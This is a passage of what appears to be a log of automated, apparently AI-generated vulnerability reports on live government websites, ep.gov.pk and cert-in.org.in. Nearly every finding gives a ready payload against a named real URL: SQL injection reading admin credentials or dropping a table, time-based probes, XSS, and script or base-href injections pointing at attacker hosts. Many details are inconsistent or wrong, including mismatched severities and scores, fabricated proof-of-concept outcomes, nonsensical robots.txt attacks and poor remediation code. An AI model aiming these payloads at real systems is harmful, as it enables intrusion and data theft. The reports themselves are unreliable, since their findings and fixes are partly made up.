\nReference: [OWASP XSS Prevention Cheat Sheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet), CWE-79\n\n---\n\n### [Reflected XSS via n / https://ep.gov.pk/Flyers.asp / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/Flyers.asp |\n\n**Description** \nThe `n` query parameter is reflected unsafely in the response, enabling script injection via crafted URLs.\n\n**Attack Scenario (Proof of Concept)** \nVisit:\n```\nhttps://ep.gov.pk/Flyers.asp?n=<img src=x onerror=alert(1)>\n```\n\nPage renders unescaped input:\n```html\n<h1>Flyer: <img src=x onerror=alert(1)></h1>\n```\n\n**Business Impact** \nSame as previous XSS case—session theft, phishing, and reputational harm.\n\n**Remediation** \nApply contextual encoding:\n```asp\nResponse.Write Server.HTMLEncode(Request.QueryString(\"n\"))\n```\nValidate/sanitize inputs at entry points. \nReference: CWE-79, OWASP Top Ten A03\n\n---\n\n### [SQL Injection via Type / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description** \nParameter `Type` appears susceptible to SQL injection, suggesting backend database queries are constructed dynamically using unsanitized user input.\n\n**Attack Scenario (Proof of Concept)** \nAccess:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Type=' OR '1'='1\n```\n\nMay return full dataset or trigger errors revealing DB structure.\n\n**Business Impact** \nData exfiltration, unauthorized access, and system compromise.\n\n**Remediation** \nUse parameterized queries:\n```sql\nSELECT * FROM tariffs WHERE type = @type\n```\nAvoid dynamic concatenation of SQL strings. 
\nReference: CWE-89, OWASP SQL Injection Prevention Cheat Sheet\n\n---\n\n### [SQL Injection via Zone / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description** \nSimilar to above, the `Zone` parameter exhibits signs of SQL injection susceptibility.\n\n**Attack Scenario (Proof of Concept)** \nURL:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Zone=' UNION SELECT username,password FROM admin--\n```\n\nCould leak administrative credentials if improperly handled.\n\n**Business Impact** \nSevere data breach potential including PII and administrative access.\n\n**Remediation** \nApply same fixes as for `Type`: use prepared statements and validate inputs strictly. \nReference: CWE-89\n\n---\n\n### [Internal Server Error (Type) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description** \nInjection attempt caused a 500 Internal Server Error, indicating poor error handling and likely improper validation of the `Type` parameter.\n\n**Attack Scenario (Proof of Concept)** \nSend malformed input:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Type='%20AND%20SLEEP(5)--\n```\n\nServer crashes or times out, confirming vulnerability.\n\n**Business Impact** \nDenial-of-service, information disclosure about backend infrastructure, and potential escalation paths.\n\n**Remediation** \nImplement robust input validation and graceful error handling:\n```asp\nOn Error Resume Next\nIf Not IsNumeric(Type) Then Exit Sub\n```\nLog exceptions securely without exposing stack traces. 
\nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (Zone) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description** \nSame root cause as above; invalid input leads to server crash.\n\n**Attack Scenario (Proof of Concept)** \nMalformed request:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Zone=') OR 1=1 --\n```\n\nResults in server-side exception and 500 error.\n\n**Business Impact** \nService disruption, debugging information leaks, and possible further exploitation.\n\n**Remediation** \nFollow same remediation steps as for `Type`. \nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (value) / https://ep.gov.pk/Calculate_Postage/cod_calculated_postage.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/Calculate_Postage/cod_calculated_postage.asp |\n\n**Description** \nPOST parameter `value` causes server failure upon injection attempt, pointing to flawed input processing logic.\n\n**Attack Scenario (Proof of Concept)** \nPOST Body:\n```\nvalue=' OR 1=1 --\n```\n\nCauses backend to fail catastrophically.\n\n**Business Impact** \nDoS, backend instability, and possible deeper exploitation opportunities.\n\n**Remediation** \nSanitize and validate all POST parameters rigorously. Avoid raw interpolation into backend logic. 
\nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (uid) / https://ep.gov.pk/HQ/AuthLocation.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/HQ/AuthLocation.asp |\n\n**Description** \nAuthentication-related endpoint fails when receiving unexpected input in `uid`.\n\n**Attack Scenario (Proof of Concept)** \nPOST:\n```\nuid=admin' --\n```\n\nLeads to authentication bypass or backend crash.\n\n**Business Impact** \nPotential privilege escalation or denial of service affecting critical auth functionality.\n\n**Remediation** \nUse strict input validation and secure coding practices around authentication flows. \nReference: CWE-20, CWE-287\n\n---\n\n### [Internal Server Error (txt_ArticleNo) / https://ep.gov.pk/ep_Complaint/Default_Test.aspx / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ep_Complaint/Default_Test.aspx |\n\n**Description** \nComplaint submission field `txt_ArticleNo` triggers server errors when manipulated.\n\n**Attack Scenario (Proof of Concept)** \nInput:\n```\ntxt_ArticleNo='; DROP TABLE complaints; --\n```\n\nMay cause catastrophic failures depending on implementation.\n\n**Business Impact** \nDisruption of complaint tracking services, possible data loss.\n\n**Remediation** \nSanitize all user inputs before passing them to backend systems. 
\nReference: CWE-20, CWE-78\n\n---\n\n### [Internal Server Error (Country_Name) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description** \nQuery string parameter `Country_Name` induces server crash when tampered with.\n\n**Attack Scenario (Proof of Concept)** \nURL:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Country_Name=' OR SLEEP(10) --\n```\n\nTriggers timeout or crash.\n\n**Business Impact** \nDoS, backend instability, and potential for deeper exploitation.\n\n**Remediation** \nValidate and sanitize all query parameters. Implement rate limiting and input constraints. \nReference: CWE-20, CWE-400",
"summary": {
"total": 16
}
}
|
{
"total": 16
}
|
|
6a103a1934b5e5e757fa513f
|
Fri May 22 2026 11:12:25 GMT+0000 (Coordinated Universal Time)
|
generate_web_vulnerability_report
|
{
"url": "https://ep.gov.pk/",
"category": "web_vulnerability",
"timestamp": "2026-05-22T11:12:25.747361+00:00",
"report": "### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description** \nThis finding indicates that a Nikto scan was successfully executed against the target asset `https://ep.gov.pk/`. Nikto is an open-source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated server software, and various server configuration issues. The completion of such a scan does not inherently represent a vulnerability; rather, it signifies reconnaissance activity that may precede more targeted attacks.\n\nThe low confidence rating suggests that this entry reflects tool execution metadata rather than a confirmed security exposure. It serves as an indicator of potential probing or automated scanning behavior directed at the host.\n\n**Attack Scenario (Proof of Concept)** \nWhile this finding itself is non-exploitable, it represents typical early-stage reconnaissance conducted by attackers prior to exploitation:\n\n1. An adversary runs Nikto using default settings:\n ```bash\n nikto -h https://ep.gov.pk/\n ```\n2. The tool queries the web server for known vulnerable paths, misconfigurations, and outdated components.\n3. Output includes informational entries about server headers, HTTP methods allowed, presence of `robots.txt`, and other passive fingerprinting data.\n4. 
Based on results, further targeted attacks can be crafted—such as exploiting weak authentication mechanisms, testing for directory traversal, or identifying legacy CMS versions with public exploits.\n\nExample output line from Nikto:\n```\n+ Server: Apache/2.4.6 (CentOS)\n+ Retrieved x-powered-by header: PHP/5.4.16\n```\n\nThese details help adversaries tailor follow-up attacks based on observed technologies and configurations.\n\n**Business Impact** \nAlthough this finding has no direct impact, its occurrence signals possible reconnaissance activity targeting the organization’s public-facing infrastructure. Repeated scans could indicate preparation for future intrusions. If left unchecked, these activities might escalate into successful compromises via unpatched vulnerabilities or insecure configurations detected during scanning.\n\nAdditionally, frequent automated scanning may contribute to log noise and consume system resources, though typically minimal in most environments.\n\n**Remediation** \nSince this is an informational finding related to detection of scanning activity, remediation focuses on hardening and monitoring practices:\n\n- **Restrict Unnecessary Access**: Implement IP allowlisting where feasible to limit access to critical endpoints.\n- **Deploy Web Application Firewall (WAF)**: Configure rules to detect and block common scanners like Nikto based on user-agent strings or abnormal request patterns.\n- **Log Analysis & Alerting**: Monitor access logs for repeated requests indicative of automated tools.\n- **Keep Systems Updated**: Ensure all web server software and applications are up to date to reduce exposure identified by scanners.\n- **Disable Information Disclosure**: Strip out verbose banners and headers revealing exact versions of underlying technologies.\n\nReference standards:\n- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n- OWASP Top Ten 2021 – A05: Security Misconfiguration\n\nNo code-level fix applies directly 
since this finding pertains to external scanner usage rather than application flaws.",
"summary": {
"total": 1
}
}
|
{
"total": 1
}
|
|
6a135d325721216a08993b02
|
Sun May 24 2026 20:18:58 GMT+0000 (Coordinated Universal Time)
|
generate_web_vulnerability_report
|
{
"url": "https://cp-club-vjti.vercel.app/",
"category": "web_vulnerability",
"timestamp": "2026-05-24T20:18:58.137426+00:00",
"report": "An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.",
"summary": {
"total": 23
}
}
|
{
"total": 23
}
|
|
6a142b38d3dd196beae9db79
|
Mon May 25 2026 10:58:00 GMT+0000 (Coordinated Universal Time)
|
generate_web_vulnerability_report
|
{
"url": "https://ep.gov.pk/",
"category": "web_vulnerability",
"timestamp": "2026-05-25T10:58:00.324770+00:00",
"report": "### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**\nA comprehensive web server security scan was conducted against the target application, resulting in the identification of various informational and low-level security observations. This finding indicates that the scanning process successfully completed and enumerated baseline server configuration details, HTTP headers, known vulnerabilities in outdated components, and common misconfigurations. The scan examined server banners, HTTP methods, directory listings, known vulnerable files/scripts, and security header implementations. While no critical vulnerabilities were identified at this stage, the completion of the scan provides a foundation for deeper security analysis and reveals the attack surface available to potential adversaries.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker would typically initiate reconnaissance by performing automated scanning against the web application to map the available services and identify potential entry points. The scanning process would involve:\n\n1. Enumerating HTTP response headers to identify server software versions:\n ```\n GET / HTTP/1.1\n Host: ep.gov.pk\n User-Agent: Mozilla/5.0\n ```\n\n2. Testing for enabled HTTP methods that could be abused:\n ```\n OPTIONS / HTTP/1.1\n Host: ep.gov.pk\n ```\n\n3. Probing for common directories and files that might expose sensitive information:\n ```\n GET /admin/ HTTP/1.1\n Host: ep.gov.pk\n \n GET /backup/ HTTP/1.1\n Host: ep.gov.pk\n ```\n\n4. 
Checking for the presence of development artifacts or configuration files:\n ```\n GET /robots.txt HTTP/1.1\n Host: ep.gov.pk\n \n GET /.git/ HTTP/1.1\n Host: ep.gov.pk\n ```\n\nThe successful completion of such scanning provides attackers with intelligence about the underlying technology stack, potential vulnerabilities in web server software, and misconfigured resources that could serve as initial footholds for more sophisticated attacks.\n\n**Business Impact**\nWhile this finding represents an informational observation rather than an exploitable vulnerability, it demonstrates that the target application is actively being scanned and analyzed by automated tools. This creates several business risks including potential exposure of server configuration weaknesses that could lead to more serious compromises, identification of outdated components that may contain known vulnerabilities, and mapping of the application's attack surface by malicious actors. The organization faces increased risk of targeted attacks based on the intelligence gathered during scanning activities, potential regulatory scrutiny if sensitive information is inadvertently exposed through misconfigurations, and reputational damage if attackers leverage identified weaknesses to compromise the application or access sensitive citizen data. Additionally, repeated scanning activity may indicate ongoing reconnaissance by threat actors, suggesting the need for enhanced monitoring and incident response capabilities.",
"summary": {
"total": 1
}
}
|
{
"total": 1
}
|
|
6a155d90a01e67ec8ef1bbf0
|
Tue May 26 2026 08:45:04 GMT+0000 (Coordinated Universal Time)
|
generate_web_vulnerability_report
|
{
"url": "https://ep.gov.pk/",
"category": "web_vulnerability",
"timestamp": "2026-05-26T08:45:04.332008+00:00",
"report": "### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**\nThe completion of a web server scanning process indicates that automated reconnaissance activities were conducted against the target web application. This represents an information-gathering phase where various known vulnerabilities, misconfigurations, and security weaknesses are systematically checked. The scan typically examines server headers, HTTP methods, directory listings, known vulnerable files, and common security misconfigurations. While the scan itself is non-exploitative, its completion suggests the target system was subjected to comprehensive security probing that may have identified multiple areas of concern requiring further investigation.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker would initiate reconnaissance by running automated scanning tools against the target domain to enumerate potential entry points:\n\n```bash\n# Initial enumeration of available HTTP methods\ncurl -X OPTIONS https://ep.gov.pk/ -I\n\n# Directory brute-forcing to discover hidden paths\nffuf -u https://ep.gov.pk/FUZZ -w /path/to/directory-wordlist.txt\n\n# Server header analysis to identify technology stack\ncurl -I https://ep.gov.pk/\n```\n\nThe scanner would systematically test for common vulnerabilities including outdated software versions, insecure HTTP headers, sensitive file exposure, and weak authentication mechanisms. Each positive identification would provide attackers with vectors for deeper exploitation attempts.\n\n**Business Impact**\nWhile this finding represents an informational observation rather than a direct vulnerability, the completion of such scanning activities indicates potential exposure to automated threat assessments. 
If conducted by malicious actors, these scans serve as precursors to targeted attacks that could result in data breaches, service compromise, or regulatory non-compliance. The organization faces increased risk profile due to visibility in automated security assessments, potentially leading to inclusion in threat actor targeting lists. Additionally, detection of scanning activities without proper monitoring controls may indicate insufficient intrusion detection capabilities, leaving the organization vulnerable to undetected reconnaissance efforts that precede more serious security incidents.",
"summary": {
"total": 1
}
}
|
{
"total": 1
}
|
|
6a1f2afed4174aff70379391
|
Tue Jun 02 2026 19:11:58 GMT+0000 (Coordinated Universal Time)
|
generate_web_vulnerability_report
|
{
"url": "https://www.cert-in.org.in/",
"category": "web_vulnerability",
"timestamp": "2026-06-02T19:11:58.376415+00:00",
"report": "### Critical Findings\n(None identified)\n\n---\n\n### High Findings\n(None identified)\n\n---\n\n### Medium Findings\n\n#### CSP: Failure to Define Directive with No Fallback / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe Content Security Policy (CSP) header lacks definition for critical directives such as `default-src`, which serves as a fallback when other directives are unspecified. Omitting such directives effectively allows unrestricted resource loading, undermining the purpose of CSP and increasing susceptibility to cross-site scripting (XSS) and data injection attacks.\n\n**Attack Scenario (Proof of Concept)**\nIf an attacker identifies an XSS vector on the page, the absence of restrictive CSP policies enables execution of arbitrary scripts:\n```html\n<script>alert(document.cookie)</script>\n```\nThis payload would execute without being blocked due to lack of policy enforcement.\n\n**Business Impact**\nFailure to enforce strict CSP directives leaves users vulnerable to client-side attacks, potentially leading to session hijacking, phishing, or defacement. It also reflects poorly on compliance posture related to secure coding practices.\n\n---\n\n#### CSP: Wildcard Directive / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nUse of wildcard (`*`) in CSP directives significantly weakens protection mechanisms. 
For instance, setting `script-src *` permits script execution from any origin, negating the benefits of CSP in mitigating XSS risks.\n\n**Attack Scenario (Proof of Concept)**\nGiven a permissive directive like `script-src *`, an attacker injects malicious JavaScript sourced externally:\n```html\n<script src=\"https://evil.com/malicious.js\"></script>\n```\nSuch scripts would be executed because the CSP explicitly allows external domains.\n\n**Business Impact**\nWildcard usage undermines user trust and exposes the organization to reputational harm and regulatory scrutiny under frameworks requiring robust input/output sanitization controls.\n\n---\n\n#### CSP: Failure to Define Directive with No Fallback / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nSimilar to the root path, the `/robots.txt` file's CSP omits essential directives like `default-src`. 
This omission implies that even auxiliary files lack proper content restrictions, making them susceptible to manipulation or exploitation.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker modifies the `robots.txt` file to include references to malicious origins:\n```txt\nSitemap: https://attacker-controlled.com/sitemap.xml\nDisallow: /\n```\nWithout strong CSP enforcement, browsers do not restrict such external references.\n\n**Business Impact**\nImproper CSP configuration on publicly accessible files can aid attackers in mapping internal structures or redirecting crawlers toward harmful content, indirectly affecting SEO and visibility.\n\n---\n\n#### CSP: Wildcard Directive / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nPresence of wildcard directives in the CSP header for `robots.txt` reduces its effectiveness in preventing unauthorized resource inclusion. 
Attackers can exploit this weakness to reference untrusted domains within metadata files.\n\n**Attack Scenario (Proof of Concept)**\nBy leveraging a wildcard directive, an attacker includes a remote stylesheet or script inside the `robots.txt` context:\n```txt\nUser-agent: *\nAllow: /*\nStyle-src: *\n```\nThough unlikely to render visually, improper parsing engines might interpret such malformed entries.\n\n**Business Impact**\nWeak CSP settings reduce overall defense-in-depth strategy, increasing chances of successful supply chain or redirection-based attacks targeting search engine crawlers.\n\n---\n\n#### CSP: Failure to Define Directive with No Fallback / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nLike other paths, the `sitemap.xml` document lacks defined CSP fallbacks. This absence means there is no baseline restriction on what resources can be loaded alongside or referenced by the XML structure.\n\n**Attack Scenario (Proof of Concept)**\nMalicious actors may inject external links into the sitemap:\n```xml\n<url>\n <loc>https://malicious-site.com/phishing</loc>\n</url>\n```\nBrowsers interpreting this file with loose CSP rules won’t block such references.\n\n**Business Impact**\nInsecure handling of structured metadata increases exposure to blackhat SEO tactics and compromises organic traffic integrity.\n\n---\n\n#### CSP: Wildcard Directive / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nWildcard use in CSP for `sitemap.xml` diminishes control over embedded or linked resources. 
Even though XML typically doesn't execute code, improper rendering contexts or parser flaws could enable unintended behavior.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker crafts a malformed entry referencing an external domain:\n```xml\n<image:image>\n <image:loc>http://untrusted.example.com/image.jpg</image:loc>\n</image:image>\n```\nWith wildcard CSP, such URLs aren’t restricted during processing.\n\n**Business Impact**\nLack of granular CSP enforcement weakens site-wide defenses against third-party tampering and indirect exfiltration techniques.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `script-src` Directive / www.cert-in.org.in /\n\n| Field | Value |\n|---------------|--------------------------------|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\n\nThe Content Security Policy (CSP) header for the target application does not define a `script-src` directive. This directive controls which sources are allowed to load or execute JavaScript on the page. Without explicit restrictions, browsers may default to allowing inline scripts and external script sources, increasing the risk of cross-site scripting (XSS) attacks. A properly configured CSP mitigates XSS by restricting script execution to trusted domains only.\n\nThis misconfiguration indicates that the application relies on implicit behavior rather than enforcing strict policies, leaving potential gaps for malicious actors to inject unauthorized scripts into the DOM context.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker who identifies this weakness can attempt to inject arbitrary JavaScript via reflected or stored XSS vectors. 
Since there's no enforced `script-src`, even inline event handlers or `<script>` tags from untrusted origins might be executed by the browser.\n\nExample payload injection:\n```html\n<script>alert(document.domain)</script>\n```\n\nIf the application reflects user input without proper sanitization—such as within a search parameter or comment field—an attacker could deliver such payloads directly to victims. The lack of `script-src` enforcement allows these scripts to run natively in the victim’s session context, enabling session hijacking, credential theft, or redirection to phishing pages.\n\n**Business Impact**\n\nWithout effective control over script execution, CERT-In's website becomes more susceptible to client-side attacks like XSS. These vulnerabilities could lead to impersonation of legitimate users, compromise of administrative sessions, or defacement of public-facing content. Given the authoritative nature of the domain, successful exploitation could undermine trust in official advisories or communications issued through the platform. Additionally, regulatory frameworks such as India’s IT Act or global standards like ISO/IEC 27001 may view inadequate CSP implementation as non-compliance with secure configuration practices.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `object-src` Directive / www.cert-in.org.in /\n\n| Field | Value |\n|---------------|--------------------------------|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\n\nThe absence of the `object-src` directive in the site's Content Security Policy means that plugins such as Flash, Java applets, PDF viewers, and other embedded objects are unrestricted. 
By default, most modern browsers will allow loading resources from any origin when this directive is omitted, unless explicitly overridden elsewhere in policy logic.\n\nSuch permissiveness exposes the application to risks including clickjacking, plugin-based exploits, and embedding of malicious third-party content that bypasses traditional HTML filtering mechanisms.\n\n**Attack Scenario (Proof of Concept)**\n\nConsider an attacker injecting the following HTML snippet onto a vulnerable page:\n```html\n<object data=\"https://malicious.example.com/exploit.swf\" type=\"application/x-shockwave-flash\"></object>\n```\n\nIn environments where Adobe Flash or similar legacy technologies remain enabled (even partially), this object tag could trigger automatic download and execution of attacker-controlled code. Alternatively, embedding a specially crafted PDF or Silverlight component could exploit parser bugs or social engineering techniques to gain access to sensitive local resources or redirect traffic.\n\nEven if direct exploitation isn't possible due to browser hardening, attackers can still use such elements to track visitors or manipulate UI flows surreptitiously.\n\n**Business Impact**\n\nAllowing unrestricted use of `<object>`, `<embed>`, or `<applet>` tags increases exposure surface area significantly. It undermines defense-in-depth strategies aimed at preventing unauthorized binary execution or interaction with deprecated technologies. For a high-profile government entity like CERT-In, such lapses heighten susceptibility to targeted campaigns leveraging outdated plug-ins or zero-day flaws in lesser-known rendering engines. 
Furthermore, compliance audits under frameworks like NIST SP 800-53 or GDPR may flag insufficient CSP coverage as a failure in securing web interfaces against known threat patterns.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `base-uri` Directive / www.cert-in.org.in /\n\n| Field | Value |\n|---------------|--------------------------------|\n| Severity | Medium |\n| CVSS Score | 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\n\nThe HTTP response headers do not include a restrictive `base-uri` directive in their Content Security Policy. This omission permits attackers to alter the base URL resolution scope using a `<base>` HTML element injected into the document. When manipulated, all relative URLs—including those used for script includes, form submissions, or navigation links—are resolved relative to the attacker-specified base URI instead of the original server.\n\nThis vulnerability enables various forms of redirection and resource manipulation, especially dangerous in combination with XSS or DOM clobbering scenarios.\n\n**Attack Scenario (Proof of Concept)**\n\nSuppose an attacker successfully injects the following HTML fragment:\n```html\n<base href=\"https://attacker-controlled-site.com/\">\n```\n\nSubsequent references to assets like `/js/main.js` or actions pointing to `/submit-report` would now resolve to `https://attacker-controlled-site.com/js/main.js` or `https://attacker-controlled-site.com/submit-report`. 
If the application dynamically loads scripts or submits forms based on relative paths, this change could result in exfiltration of credentials or execution of hostile JavaScript hosted remotely.\n\nAdditionally, phishing overlays or spoofed login portals could be rendered seamlessly because internal navigation remains visually consistent while being silently rerouted behind the scenes.\n\n**Business Impact**\n\nA missing `base-uri` directive weakens integrity guarantees around intra-page linking and dynamic asset retrieval. In worst-case scenarios involving compromised endpoints or insider threats, adversaries could leverage this flaw to redirect critical workflows—such as incident reporting portals—to rogue infrastructure they control. Such manipulations pose severe reputational harm to CERT-In, particularly during active cyber incidents where timely communication and accurate information flow are paramount. Regulatory bodies assessing cybersecurity posture may also interpret incomplete CSP deployment as indicative of broader governance deficiencies in secure software development lifecycle adherence.\n\n---\n\n### Low Findings\n\n#### Timestamp Disclosure - Unix / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nUnix timestamps were detected in server responses, possibly indicating system time disclosure. 
Although seemingly benign, such information can help an attacker narrow the search space for time-seeded tokens or identifiers and profile when content is regenerated.\n\n**Attack Scenario (Proof of Concept)**\nResponse contains a visible timestamp:\n```json\n{\n \"generated_at\": 1712345678\n}\n```\nThe value decodes to 2024-04-05T19:34:38Z. An attacker who knows that a token or reset link is derived from such a time can narrow a brute-force window to the seconds around it, or correlate the value with other logs.\n\n**Business Impact**\nMinor leakage of temporal metadata may support targeted reconnaissance efforts but poses minimal standalone threat unless combined with other vulnerabilities.\n\n---\n\n#### Timestamp Disclosure - Unix / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nTimestamps observed in the `robots.txt` response suggest server-side dynamic generation or logging activity. While low-risk individually, repeated disclosures help build behavioral profiles of backend systems.\n\n**Attack Scenario (Proof of Concept)**\nHeader or body reveals a last-modified date (shown here as an HTTP-date, which is not itself a Unix timestamp; the scanner's ten-digit match should be confirmed separately):\n```\nLast-Modified: Fri, 05 Apr 2024 12:34:56 GMT\n```\nAttackers correlate update frequencies with known maintenance windows or patch cycles.\n\n**Business Impact**\nLimited impact; however, consistent timestamp leaks contribute to broader intelligence gathering campaigns aimed at optimizing future intrusions.\n\n---\n\n#### Timestamp Disclosure - Unix / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nTimestamps present in `sitemap.xml` indicate automated generation processes. 
